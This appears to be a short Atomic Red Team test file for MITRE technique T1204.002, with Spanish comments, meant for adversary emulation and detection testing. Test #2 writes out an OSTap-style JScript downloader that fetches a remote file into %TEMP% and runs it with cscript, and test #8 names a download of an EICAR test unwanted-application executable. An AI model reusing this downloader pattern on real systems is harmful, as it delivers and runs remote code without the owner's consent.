################T1204.002.md################

##Atomic Test #2 - OSTap Payload Download

```echo var url = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > %TEMP%\OSTapGet.js```
```cscript //E:Jscript %TEMP%\OSTapGet.js```

#Borrado
del %TEMP%\OSTapGet.js /F /Q >nul 2>&1

```PAUSE```

##Atomic Test #8 - Potentially Unwanted Applications (PUA)

#Descargar http://amtso.eicar.org/PotentiallyUnwanted.exe

#Borrado
#Detener y eliminar 

```PAUSE```